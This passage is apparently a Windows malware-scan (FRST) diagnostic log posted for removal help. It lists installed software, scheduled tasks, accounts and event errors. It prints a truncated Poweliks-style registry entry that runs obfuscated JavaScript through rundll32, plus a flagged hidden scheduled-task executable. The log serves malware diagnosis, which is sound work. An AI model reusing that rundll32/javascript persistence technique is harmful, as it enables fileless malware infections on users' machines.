(Version: 3.5.50.0 - Microsoft Corporation)Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)Microsoft Project Professional 2010 (HKLM-x32\...\Office14.PRJPRO) (Version: 14.0.7015.1000 - Microsoft Corporation)Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)Microsoft Visio Professional 2010 (HKLM-x32\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)Mini Metro (HKLM-x32\...\Steam App 287980) (Version: - Dinosaur Polo Club)Monaco (HKLM-x32\...\Steam App 113020) (Version: - Pocketwatch Games)Mount & Blade: Warband (HKLM-x32\...\Steam App 48700) (Version: - TaleWorlds Entertainment)Mount & Blade: With Fire and Sword (HKLM-x32\...\Steam App 48720) (Version: - TaleWorlds Entertainment)MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)Multiwinia (HKLM-x32\...\Steam App 1530) (Version: - Introversion Software)Nidhogg (HKLM-x32\...\Steam App 94400) (Version: - Messhof)Nosferatu: The Wrath of Malachi (HKLM-x32\...\Steam App 283290) (Version: - Idol FX)Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.7 - )NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)OpenAL (HKLM-x32\...\OpenAL) (Version: - )Overwolf (HKLM-x32\...\Overwolf) (Version: 0.81.34.0 - Overwolf Ltd.)PANTECH Handset USB Driver (HKLM\...\{B9676D15-E0EC-42c2-8C16-F3D9648C44AF}) (Version: 1.1.4580.1215 - PANTECH CO,.LTD)Pantech PCSuite (HKLM-x32\...\{69187EC5-F5CF-4B2C-B920-5A17F44D9685}) (Version: 1.0 - Pantech)Pantech PCSuite (x32 Version: 1.0 - Pantech) HiddenPapers, Please (HKLM-x32\...\Steam App 239030) (Version: - 3909)PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version: - OVERKILL Software)PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.5.1 - Frank Heindörfer, Philip Chinery)Plantronics® GameCom 780 Software for Dolby® Headphone (HKLM-x32\...\{EB3C9064-9140-4279-9E51-965119402151}) (Version: 1.00.0001 - Plantronics)Prison Architect (HKLM-x32\...\Steam App 233450) (Version: - Introversion Software)Prototype (HKLM-x32\...\Steam App 10150) (Version: - Radical Entertainment)PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)Quake III Arena (HKLM-x32\...\Steam App 2200) (Version: - id Software)Raptr (HKLM-x32\...\Raptr) (Version: - )Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)Receiver (HKLM-x32\...\Steam App 234190) (Version: - Wolfire Games)Return to Castle Wolfenstein (HKLM-x32\...\Steam App 9010) (Version: - Gray Matter Studios)Risk of Rain (HKLM-x32\...\Steam App 248820) (Version: - )Rogue Shooter: The FPS Roguelike (HKLM-x32\...\Steam App 295770) (Version: - Hippomancer)RollerCoaster Tycoon 2: Triple Thrill Pack (HKLM-x32\...\Steam App 285330) (Version: - Chris Sawyer Productions)RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version: - Frontier)RUNNING WITH RIFLES (HKLM-x32\...\Steam App 270150) (Version: - Modulaatio Games)Safecracker: The Ultimate Puzzle Adventure (HKLM-x32\...\Steam App 3260) (Version: - Kheops Studio)Sang-Froid - Tales of Werewolves (HKLM-x32\...\Steam App 227220) (Version: - Artifice Studio)Secrets of Rætikon (HKLM-x32\...\Steam App 246680) (Version: - Broken Rules)Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPRO_{58FA40EF-ABA9-4FED-AD3D-318A6073934D}) (Version: - Microsoft)Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0057-0000-0000-0000000FF1CE}_Office14.VISIO_{359ADBEC-068A-4CC9-9174-77AB8EDB867A}) (Version: - Microsoft)Shadowgate (HKLM-x32\...\Steam App 294440) (Version: - Zojoi)Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)SpaceChem (HKLM-x32\...\Steam App 92800) (Version: - Zachtronics)SpinFire 9.0 Core (x32 Version: 9.0.1435.1435 - Actify, Inc) HiddenStar Wars: Knights of the Old Republic (HKLM-x32\...\Steam App 32370) (Version: - BioWare)Starbound (HKLM-x32\...\Steam App 211820) (Version: - )Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)Sunless Sea (HKLM-x32\...\Steam App 304650) (Version: - Failbetter Games)TeamSpeak 3 Client (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)Teleglitch: Die More Edition (HKLM-x32\...\Steam App 234390) (Version: - Test3 Projects)Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)The Binding of Isaac (HKLM-x32\...\Steam App 113200) (Version: - Edmund McMillen and Florian Himsl)The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)The Escapists (HKLM-x32\...\Steam App 298630) (Version: - Mouldy Toof Studios)The Secret of Monkey Island: Special Edition (HKLM-x32\...\Steam App 32360) (Version: - LucasArts)The Talos Principle Public Test (HKLM-x32\...\Steam App 330710) (Version: - Croteam)TightVNC 2.0.2 (HKLM-x32\...\TightVNC) (Version: 2.0.2 - GlavSoft LLC.)Unity Web Player (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\UnityWebPlayer) (Version: - Unity Technologies ApS)Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)Valiant Hearts: The Great War™ / Soldats Inconnus : Mémoires de la Grande Guerre™ (HKLM-x32\...\Steam App 260230) (Version: - Ubisoft Montpellier)Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)World of Goo (HKLM-x32\...\Steam App 22000) (Version: - 2D BOY)Ziggurat (HKLM-x32\...\Steam App 308420) (Version: - Milkstone Studios) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-2217723503-548262416-3983414958-1007_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= 10-11-2014 00:40:03 Windows Update ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2012-08-14 09:13 - 00000968 ____A C:\Windows\system32\Drivers\etc\hosts10.100.5.252 bmtex2010172.20.16.155 grfdfs10.100.5.50 stl2k3ns110.100.5.51 stl2k3ns210.100.5.52 stl2k3dc110.100.5.53 stl2k3dc2 ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {2F324146-BA28-46F8-A8E2-C8E487EF7EBB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)Task: {482D745E-ECAD-4DD7-ABB2-87622D2AD612} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)Task: {5447ECDB-2C78-401D-BFAE-F7C6E6F830AF} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2014-10-22] (Overwolf LTD)Task: {A9237A40-FCB0-40E2-B712-4D310799122D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)Task: {AA3A2AC5-53FF-4D70-B6F1-39A55FA7BA06} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)Task: {AAFD7EB2-F0DF-4E39-8C89-8F15B716ED81} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)Task: {B3E7C114-D31F-402A-9253-A4FB8DCB1E3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)Task: {DF3E1F4C-B60E-4DFD-93A5-91A4BD728439} - System32\Tasks\{44A1741A-3325-5E3D-3774-F73A5D212500} => C:\Users\Calahan\AppData\Roaming\BMMCegjc\BfVFqtQW\sSmQiMZV\HDDIaJDbA.exe <==== ATTENTIONTask: {E9004E9C-6652-4A05-ABDD-0AE18E65854F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)Task: {EF3C8A0C-24A9-4BAE-9739-B91FE7A27393} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2014-02-28 17:18 - 2014-02-28 17:18 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll2009-11-24 18:36 - 2009-11-24 18:36 - 00125440 _____ () C:\Program Files (x86)\Notepad++\NppShell_01.dll2014-06-27 17:44 - 2011-12-01 14:15 - 00777448 ____N () C:\Program Files\Plantronics\GameCom780\GameCom780.exe2012-09-13 00:38 - 2012-09-13 00:38 - 00264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe2014-06-27 17:44 - 2011-12-01 14:16 - 00150760 ____N () C:\Program Files\Plantronics\GameCom780\VmixPLGC.dll2012-09-13 00:38 - 2012-09-13 00:38 - 02144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 07955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 00341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 00028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 00127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll2012-09-13 00:39 - 2012-09-13 00:39 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF2010-10-20 14:45 - 2010-10-20 14:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll2011-11-08 15:46 - 2011-11-08 15:46 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll2014-10-29 11:26 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll2014-10-29 11:26 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll2014-10-29 11:26 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll2014-10-29 11:26 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll2014-10-29 11:26 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ========================= Accounts: ========================== Administrator (S-1-5-21-2217723503-548262416-3983414958-500 - Administrator - Disabled) => C:\Users\Administrator.cvci20462Calahan (S-1-5-21-2217723503-548262416-3983414958-1007 - Administrator - Enabled) => C:\Users\CalahanElisa (S-1-5-21-2217723503-548262416-3983414958-1006 - Limited - Enabled) => C:\Users\ElisaGuest (S-1-5-21-2217723503-548262416-3983414958-501 - Limited - Enabled) => C:\Users\GuestHomeGroupUser$ (S-1-5-21-2217723503-548262416-3983414958-1003 - Limited - Enabled)Logan (S-1-5-21-2217723503-548262416-3983414958-1005 - Administrator - Enabled) => C:\Users\LoganMike2 (S-1-5-21-2217723503-548262416-3983414958-1004 - Administrator - Enabled) => C:\Users\Mike2 ==================== Faulty Device Manager Devices ============= Name: PS/2 Compatible MouseDescription: PS/2 Compatible MouseClass Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: i8042prtProblem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.Devices stay in this state if they have been prepared for removal.After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Event log errors: ========================= Application errors:==================Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)Description: Product: Adobe Reader XI - Update '{AC76BA86-7AD7-0000-2550-7A8C40011009}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127 Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: accrdsub.exe, version: 6.2.1.52, time stamp: 0x4a266469Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24Exception code: 0xc0000005Fault offset: 0x0000000000052eefFaulting process id: 0x838Faulting application start time: 0xaccrdsub.exe0Faulting application path: accrdsub.exe1Faulting module path: accrdsub.exe2Report Id: accrdsub.exe3 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000Exception code: 0xc0000005Fault offset: 0x08356020Faulting process id: 0x4bcFaulting application start time: 0xiexplore.exe0Faulting application path: iexplore.exe1Faulting module path: iexplore.exe2Report Id: iexplore.exe3 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000Exception code: 0xc0000005Fault offset: 0x0840e020Faulting process id: 0x2e2cFaulting application start time: 0xiexplore.exe0Faulting application path: iexplore.exe1Faulting module path: iexplore.exe2Report Id: iexplore.exe3 Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )Description: The program iexplore.exe version 9.0.8112.16584 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 2074 Start Time: 01cffc98a2a67803 Termination Time: 10 Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe Report Id: e82a2d01-688b-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x541caffdFaulting module name: WININET.dll, version: 9.0.8112.16584, time stamp: 0x541cb050Exception code: 0xc0000005Fault offset: 0x000d4825Faulting process id: 0x3230Faulting application start time: 0xiexplore.exe0Faulting application path: iexplore.exe1Faulting module path: iexplore.exe2Report Id: iexplore.exe3 Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50edFaulting module name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50edException code: 0xc0000005Fault offset: 0x004232b5Faulting process id: 0x2c4cFaulting application start time: 0xFalloutNV.exe0Faulting application path: FalloutNV.exe1Faulting module path: FalloutNV.exe2Report Id: FalloutNV.exe3 Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: chrome.exe, version: 38.0.2125.111, time stamp: 0x5447163bFaulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7Exception code: 0xc0000374Fault offset: 0x000ce753Faulting process id: 0xc10Faulting application start time: 0xchrome.exe0Faulting application path: chrome.exe1Faulting module path: chrome.exe2Report Id: chrome.exe3 Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp System errors:=============Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 40. The internal error state is 252. Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 40. The internal error state is 252. Error: (11/10/2014 08:22:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: The HP Health Check Service service failed to start due to the following error: %%2 Error: (11/10/2014 08:21:45 PM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/10/2014 08:18:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: The DameWare Mini Remote Control service failed to start due to the following error: %%3 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Microsoft Office Sessions:=========================Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)Description: Adobe Reader XI{AC76BA86-7AD7-0000-2550-7A8C40011009}1625(NULL)(NULL)(NULL) Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )Description: accrdsub.exe6.2.1.524a266469ntdll.dll6.1.7601.18247521eaf24c00000050000000000052eef83801cff7cbaa298beaC:\Program Files\ActivIdentity\ActivClient\accrdsub.exeC:\Windows\SYSTEM32\ntdll.dllb5425d6b-6934-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c0000005083560204bc01cffc99acb61f44C:\Program Files\Internet Explorer\iexplore.exeunknown07177948-688d-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c00000050840e0202e2c01cffc99acb58302C:\Program Files\Internet Explorer\iexplore.exeunknown0717a058-688d-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )Description: iexplore.exe9.0.8112.16584207401cffc98a2a6780310C:\Program Files (x86)\Internet Explorer\iexplore.exee82a2d01-688b-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.16584541caffdWININET.dll9.0.8112.16584541cb050c0000005000d4825323001cffc98a390db72C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\syswow64\WININET.dlle64fc0be-688b-11e4-a553-6c626d9e55b8 Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )Description: FalloutNV.exe1.4.0.5254e0d50edFalloutNV.exe1.4.0.5254e0d50edc0000005004232b52c4c01cffb75dc2e1c3cC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exeC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exe2309037f-67b2-11e4-a553-6c626d9e55b8 Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )Description: chrome.exe38.0.2125.1115447163bntdll.dll6.1.7601.18247521ea8e7c0000374000ce753c1001cffb1f87a3d830C:\Program Files (x86)\Google\Chrome\Application\chrome.exeC:\Windows\SysWOW64\ntdll.dll9d5c5460-6713-11e4-a553-6c626d9e55b8 Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp CodeIntegrity Errors:=================================== Date: 2011-12-05 22:19:14.852 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 22:10:09.618 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 22:03:00.342 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 21:51:41.439 Description: Code Integrity is unable to verify the 